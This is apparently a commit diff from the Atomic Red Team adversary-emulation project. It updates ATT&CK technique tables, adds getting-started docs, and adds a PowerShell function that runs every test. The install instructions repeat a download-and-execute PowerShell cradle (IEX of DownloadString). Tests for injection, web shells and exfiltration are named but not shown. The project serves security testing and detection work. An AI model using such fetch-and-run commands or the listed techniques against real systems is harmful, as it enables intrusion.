| | [Trap](./T1154/T1154.md) | [Launchctl](./T1152/T1152.md) | [Web Shell](./T1100/T1100.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Local Job Scheduling](./T1168/T1168.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Removal on Host](./T1070/T1070.md) | | | | | | |
| | [Windows Management Instrumentation](./T1047/T1047.md) | [Logon Scripts](./T1037/T1037.md) | | [Indirect Command Execution](./T1202/T1202.md) | | | | | | |
@@ -56,7 +56,7 @@
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | [Trap](./T1154/T1154.md) | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Web Shell](./T1100/T1100.md) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | |
atomics/windows-index.md
+24 -11
View File
@@ -92,6 +92,7 @@
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #4: Process Injection via C# [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
@@ -163,6 +164,7 @@
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #4: Process Injection via C# [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053 Scheduled Task](./T1053/T1053.md)
- Atomic Test #1: At.exe Scheduled task [windows]
@@ -170,7 +172,8 @@
- Atomic Test #3: Scheduled task Remote [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
# persistence
- [T1015 Accessibility Features](./T1015/T1015.md)
@@ -255,7 +258,8 @@
- T1019 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1209 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
@@ -364,6 +368,8 @@
- [T1076 Remote Desktop Protocol](./T1076/T1076.md)
- Atomic Test #1: RDP [windows]
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -390,12 +396,12 @@
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: PowerShell [windows]
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1114 Email Collection](./T1114/T1114.md)
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
- [T1056 Input Capture](./T1056/T1056.md)
- Atomic Test #1: Input Capture [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -408,6 +414,9 @@
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- Atomic Test #2: Compress Data for Exfiltration With Rar [windows]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
- T1041 Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -442,11 +451,12 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
- Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #9: Powershell XML requests [windows]
- Atomic Test #10: Powershell invoke mshta.exe download [windows]
- Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #12: PowerShell Fileless Script Execution [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
@@ -505,7 +515,10 @@
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Remote File Copy](./T1105/T1105.md)
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #1: Malicious User Agents [windows]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
atomics/windows-matrix.md
+5 -5
View File
@@ -6,22 +6,22 @@
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | [Password Policy Discovery](./T1201/T1201.md) | [Remote File Copy](./T1105/T1105.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Input Capture](./T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Input Capture](./T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Email Collection](./T1114/T1114.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Permission Groups Discovery](./T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | [DCShadow](./T1207/T1207.md) | LLMNR/NBT-NS Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](./T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](./T1170/T1170.md) | [Component Object Model Hijacking](./T1122/T1122.md) | [Image File Execution Options Injection](./T1183/T1183.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | [Query Registry](./T1012/T1012.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](./T1086/T1086.md) | [Create Account](./T1136/T1136.md) | [New Service](./T1050/T1050.md) | DLL Side-Loading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](./T1174/T1174.md) | [Remote System Discovery](./T1018/T1018.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Private Keys](./T1145/T1145.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvr32](./T1117/T1117.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | [Windows Remote Management](./T1028/T1028.md) | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvr32](./T1117/T1117.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | [Rundll32](./T1085/T1085.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hidden Files and Directories](./T1158/T1158.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scripting](./T1064/T1064.md) | [Hooking](./T1179/T1179.md) | [Scheduled Task](./T1053/T1053.md) | [File Deletion](./T1107/T1107.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | [Service Execution](./T1035/T1035.md) | [Hypervisor](./T1062/T1062.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | | [System Service Discovery](./T1007/T1007.md) | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Signed Binary Proxy Execution](./T1218/T1218.md) | [Image File Execution Options Injection](./T1183/T1183.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Time Discovery](./T1124/T1124.md) | | | | |
| | [Signed Script Proxy Execution](./T1216/T1216.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
| | [Signed Script Proxy Execution](./T1216/T1216.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Web Shell](./T1100/T1100.md) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Scripts](./T1037/T1037.md) | | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Modify Existing Service](./T1031/T1031.md) | | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Netsh Helper DLL](./T1128/T1128.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
@@ -40,7 +40,7 @@
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Web Shell](./T1100/T1100.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
docs/invoke-atomic-red-team.md
+126
View File
@@ -0,0 +1,126 @@
---
layout: default
---
# Getting Started - PowerShell Invoke-AtomicRedTeam
1. [Install Atomic Red Team](#install-atomic-red-team)
2. [Generate Tests](#generate-tests)
3. [Execute Tests](#execute-tests)
4. [Other Examples](#Other-Examples)
## Install Atomic Red Team
* Be sure to get permission and necessary approval before conducting test's. Unauthorized testing is a bad decision
and can potentially be a resume-generating event.
* Set up a test machine that would be similar to the build in your environment. Be sure you have your collection/EDR
solution in place, and that the endpoint is checking in and active. It is best to have AV turned off.
We made installing Atomic Red Team extremely easy.
Once the environment is ready, run the following PowerShell one liner as Administrator:
`powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://psinstall.AtomicRedTeam.com')"`
[Source](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/install-AtomicRedTeam.ps1)
By default, it will download and install Atomic Red Team to `c:\tools\`
Running the [install script](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/install-AtomicRedTeam.ps1) locally provides three parameters:
InstallPath
- Where ART is to be installed
`install-AtomicRedTeam.ps1 -InstallPath c:\tools\`
DownloadPath
- Where ART is to be downloaded
`install-AtomicRedTeam.ps1 -DownloadPath c:\tools\`
Verbose
- Verbose output during installation
`install-AtomicRedTeam.ps1 -verbose`
### Manual Installation
To manually install Invoke-AtomicRedTeam:
`set-executionpolicy Unrestricted`
[PowerShell-Yaml](https://github.com/cloudbase/powershell-yaml) is required to parse Atomic yaml files:
`Install-Module -Name powershell-yaml`
`Import-Module .\Invoke-AtomicRedTeam.psm1`
## Generate Tests
This process generates all Atomic tests and allows for easy copy and paste execution.
Note: you may need to change the path.
Invoke-AllAtomicTests -GenerateOnly
### Execute All Tests
Execute all Atomic tests:
Invoke-AllAtomicTests
### Execute All Tests - Specific Directory
Specify a path to atomics folder, example C:\AtomicRedTeam\atomics
Invoke-AllAtomicTests -path C:\AtomicRedTeam\atomics
### Execute a Single test
$T1117 = Get-AtomicTechnique -Path ..\..\atomics\T1117\T1117.yaml
Invoke-AtomicTest $T1117
## Other Examples
If you would like output when running tests using the following:
#### Informational Stream
```powershell
Invoke-AtomicTest $T1117 -InformationAction Continue
```
#### Verbose Stream
```powershell
Invoke-AtomicTest $T1117 -Verbose
```
#### Debug Stream
```powershell
Invoke-AtomicTest $T1117 -Debug
```
#### WhatIf
If you would like to see what would happen without running the test
```powershell
Invoke-AtomicTest $T1117 -WhatIf
```
#### Confirm
To run all tests without confirming them run using the Confirm switch to false
```powershell
Invoke-AtomicTest $T1117 -Confirm:$false
```
Or you can set your `$ConfirmPreference` to 'Medium'
```powershell
$ConfirmPreference = 'Medium'
Invoke-AtomicTest $T1117
```
execution-frameworks/Invoke-AtomicRedTeam/Invoke-AtomicRedTeam/Public/Invoke-AllAtomicTests.ps1
+78
View File
@@ -0,0 +1,78 @@
<#
.SYNOPSIS
Invokes all Atomic test(s)
.DESCRIPTION
Invokes all Atomic tests(s). Optionally, you can specify if you want to generate all Atomic test(s) only.
.EXAMPLE Invokes Atomic Test
PS/> Invoke-AllAtomicTests
PS/> Invoke-AllAtomicTests -Force
.EXAMPLE Generate All Atomic Tests
PS/> Invoke-AllAtomicTests -GenerateOnly
.PARAMETER Path
Path to atomics folder, example C:\AtomicRedTeam\atomics
.PARAMETER GenerateOnly
Generate tests only do not execute. Writes test commands to STDOUT
.PARAMETER Force
Override safety handler. Normally this will prompt you to confirm all tests. This will override that.
.NOTES
Create Atomic Tests from yaml files described in Atomic Red Team. https://github.com/redcanaryco/atomic-red-team
.LINK
Github repo: https://github.com/redcanaryco/atomic-red-team
#>
function Invoke-AllAtomicTests {
[CmdletBinding(DefaultParameterSetName = 'technique',
SupportsShouldProcess = $true,
PositionalBinding = $false,
ConfirmImpact = 'Medium')]
Param(
[Parameter(Mandatory = $true,
Position = 0,
ValueFromPipelineByPropertyName = $true,
ParameterSetName = 'technique')]
[ValidateNotNullOrEmpty()]
[System.String]
$Path,
[Parameter(Mandatory = $false,
Position = 1,
ValueFromPipelineByPropertyName = $true,
ParameterSetName = 'technique')]
[switch]
$GenerateOnly,
[switch]
$Force
)
$InformationPreference = 'Continue'
function Invoke-AllTests()
{
[System.Collections.HashTable]$AllAtomicTests = @{}
$AtomicFilePath = $Path
Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {
$currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)
$parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw ))
$AllAtomicTests.Add($currentTechnique, $parsedYaml);
}
if($GenerateOnly)
{
$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value -GenerateOnly }
}
else
{
$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value }
}
}
if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to execute all tests?',
"Highway to the danger zone, Executing All Atomic Tests!" ) )
{
Invoke-AllTests
}
}
execution-frameworks/Invoke-AtomicRedTeam/README.md
+45 -15
View File
@@ -4,7 +4,30 @@
### Install Atomic Red Team
Get started quickly with our simple Powershell [script](install-atomicredteam.ps1).
Get started with our simple Install script:
`powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://psInstall.AtomicRedTeam.com')"`
[Source](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/Install-AtomicRedTeam.ps1)
By default, it will download and Install Atomic Red Team to `c:\AtomicRedTeam`
Running the [Install script](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/Install-AtomicRedTeam.ps1) locally provides three parameters:
InstallPath
- Where ART is to be Installed
`Install-AtomicRedTeam.ps1 -InstallPath c:\tools\`
DownloadPath
- Where ART is to be downloaded
`Install-AtomicRedTeam.ps1 -DownloadPath c:\tools\`
Verbose
- Verbose output during Installation
`Install-AtomicRedTeam.ps1 -verbose`
### Manual
@@ -20,7 +43,27 @@ Get started quickly with our simple Powershell [script](install-atomicredteam.ps
## Getting Started
### Execute a Single Test
### Generate Tests
This process generates all Atomic tests and allows for easy copy and paste execution.
Note: you may need to change the path.
Invoke-AllAtomicTests -GenerateOnly
#### Execute All Tests
Execute all Atomic tests:
Invoke-AllAtomicTests
#### Execute All Tests - Specific Directory
Specify a path to atomics folder, example C:\AtomicRedTeam\atomics
Invoke-AllAtomicTests -path C:\AtomicRedTeam\atomics
#### Execute a Single Test
```powershell
$T1117 = Get-AtomicTechnique -Path ..\..\atomics\T1117\T1117.yaml
@@ -71,16 +114,3 @@ Or you can set your `$ConfirmPreference` to 'Medium'
$ConfirmPreference = 'Medium'
Invoke-AtomicTest $T1117
```
## Generate All Tests
```powershell
[System.Collections.HashTable]$AllAtomicTests = @{}
$AtomicFilePath = 'C:\AtomicRedTeam\atomics\'
Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {
$currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)
$parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw ))
$AllAtomicTests.Add($currentTechnique, $parsedYaml);
}
$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value -GenerateOnly }
```
execution-frameworks/Invoke-AtomicRedTeam/install-atomicredteam.ps1
+1 -8
View File
@@ -74,14 +74,7 @@ function Install-AtomicRedTeam {
.EXAMPLE
[System.Collections.HashTable]$AllAtomicTests = @{}
$AtomicFilePath = 'C:\AtomicRedTeam\atomics\'
Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {
$currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)
$parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw ))
$AllAtomicTests.Add($currentTechnique, $parsedYaml);
}
